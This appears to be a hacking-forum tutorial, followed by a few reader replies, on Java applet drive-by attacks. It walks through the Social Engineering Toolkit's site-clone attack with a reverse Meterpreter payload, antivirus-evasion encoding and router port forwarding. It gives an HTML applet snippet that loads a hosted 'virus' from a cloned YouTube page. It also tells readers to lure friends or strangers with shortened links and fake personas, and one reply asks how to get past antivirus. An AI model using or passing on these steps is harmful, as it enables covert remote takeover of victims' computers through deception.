★TuT★ Ultimate Java Drive By ★TuT★

[size=x-large]ULTIMATE JAVA DRIVE BY TuT
-Will be showing one advanced (Backtrack) method
And for people who are lazy to download backtrack:
- Java drive by - site clone on windows.*******[/i][/align]
[align=center]
*******BackTrack Method*******
You guys said that you didn't like colored version so i removed colors
Today i will i show you how to preform Java Applet attack using Social Engineering Toolkit OUTSIDE your network. Many members have requested this so i'll answer their calls.
You'll need
- BackTrack
#1 Port Forwarding
FAQ about Port Forwarding are here: [You must be registered and logged in to see this link.]
First thing that we need to do is Forward some Ports. Go to start > run > cmd
[You must be registered and logged in to see this image.]
Type ipconfig and look for default gateway.
By default it is
- 192.168.1.1
Copy your default gateway in your browser and then type admin for both username and password.
Try finding something that says forwarding or virtual servers. (If you don't find it go to [You must be registered and logged in to see this link.] and find instructions to forward your router.)[You must be registered and logged in to see this image.]
Then click add
-For port type in 4444.
-For ip type local ip of BackTrack. (open konsole and type ifconfig) [You must be registered and logged in to see this image.]
-Chose protocol and there you go.
Now using the same method forward ports 443 and 80. [You must be registered and logged in to see this image.]
Now for multiple routers (ONLY IF ARE BEHIND MULTIPLE ROUTERS, IF YOU AREN'T SKIP THIS STEP) it gets difficult. Log in to your second router. Find WAN settings and take note of your other default gateway.--> the one of your first router. [You must be registered and logged in to see this image.]
Go to quick setup or something like that chose static ip and in ip fill in desired ip (any ip that has first 3 rows same as default gateway of your first router. Default gateway of my first router is 192.168.1.1, so i can set static ip to be 192.168.1.50), for subnet mask 255.255.255.0 and for default gateway 192.168.1.1 [You must be registered and logged in to see this image.]
For dns you need to log on to your first router. Find Primary DNS and copy-paste.
[You must be registered and logged in to see this image.]
Finish the quick setup. Congratz! You set up your routers static ip. Now we need to forward ports from 1st router to static ip, then from 2nd router to your local ip.
Now in the first router go to virtual servers and forward the port to static ip you just made (192.168.1.50)
[You must be registered and logged in to see this image.]
and in the second router forward the ports (4444,443,80) to your local ip.
[You must be registered and logged in to see this image.]
2# Configuring SET#
Start Backtrack. I am using BackTrack 5.
-First we need to configure SET. Go to /pentest/exploits/set/config and open set_config file.
-Change AUTO_DETECT=ON to AUTO_DETECT=OFF.
[You must be registered and logged in to see this image.]
And while you're here change APACHE_SERVER=OFF to ON. Now save this.
3# Using Social Engineering Toolkit
-Open up a new console. Type:
cd /pentest/exploits/set/ (and press enter lol)
[You must be registered and logged in to see this image.]
- Now type
./set
This opens up Social Engineering Toolkit's main menu.
- Now chose Website attack vectors. (2)
- Chose the Java applet attack (1)
[You must be registered and logged in to see this image.]
- Chose site clone (2)
Now since we set auto detect off it asks if our SET machine is not on the same ip address as our listener. We say
- No
[You must be registered and logged in to see this image.]
It asks for ip for reverse connection. Open up Google Chrome because it's awesome and go to [You must be registered and logged in to see this link.]
- Copy that ip and paste it. That is your external ip.
Now it asks for url to clone. If you wanna trick a friend you could use anything, he trusts you. But if you're using this online copy url of some webcam site (likehttp://www.ivideochat.com/main.php) and pretend to be innocent girl. So for example, here we type
- [You must be registered and logged in to see this link.]
[You must be registered and logged in to see this image.]
Chose payload which you want to generate. That would be Reverse Meterpreter.
- 2
Chose encoder to bypass anti virus. The best would be:
- 16
Earlier we also turned told SET# to use apache, so we need to minimize SET#, And click on:
- Applications>Backtrack>Services>HTTPD>Apache start
[/color]Enter port for the listener. Earlier we Forwarded port
- 4444
[You must be registered and logged in to see this image.]
Now Metasploit is loading. However lhost is set to 0.0.0.0
To change this simply press enter, and type:
- set lhost (your local ip)
This is pretty much it. Now you copy your external ip and go to [You must be registered and logged in to see this link.] or any other shortening site, paste your external ip (one you found on [You must be registered and logged in to see this link.] and clickshorten. Send that link to your friends, beloved ones, or just some fat, bald, horny guy on the internet. It's your call!
When he/she falls for it, meterpreter session will open. You can find numerous tutorials here on ******* that cover meterpreter commands. Please provide some feedback.
If i get 50+ comments i'm making a video.
[/align]
[align=center]*******Windows method.*******
Open any web page, for example [You must be registered and logged in to see this link.]
-Right click on it and click save as. You downloaded two files. In my case they are watch and a folder called watch_files
- You need to host two things:
1) Files you just downloaded
2) Your server
It has to be direct download link. For the sake of this TuT i am gonna use DropBox for my server and 000webhost for the files i downloaded.
First, lets host our server. Download dropbox, make an account, and open public folder. Then, just copy/paste your server there.
- Right click it, move mouse over dropbox option and click Copy Public Link.
-Now open the watch.htm with notepad and writethis at the very end of the file.

<APPLET CODE = "Client.class" ARCHIVE = "Client.jar" WIDTH = "0" HEIGHT = "0">
<PARAM NAME = "AMLMAFOIEA" VALUE = "YOURVIRUSURL">
</APPLET>

- Replace YOURVIRUSURL with dropbox url we just copied.
- Save the file and register at 000webhost.com
- Go to cpanel and then to file manager.
- Go to Public folder and click upload.
- Zip files you downloaded from before. NOTE: It doesn't accept winrar. If you can't zip it create a new folder in public folder called watch_files. Open it and upload it's content. Then go back to Public file and upload watch.htm
- Chose to upload zipped files (right part of the screen)
- To start drive by, click open on your watch.htm file. A perfect copy of youtube will appear. Copy the url and go to goo.gl to mask it. Happy hunting!

This is just amazing! :D
I love you guys and what you do!
But then Antivirus detects this.. :(
any solutions?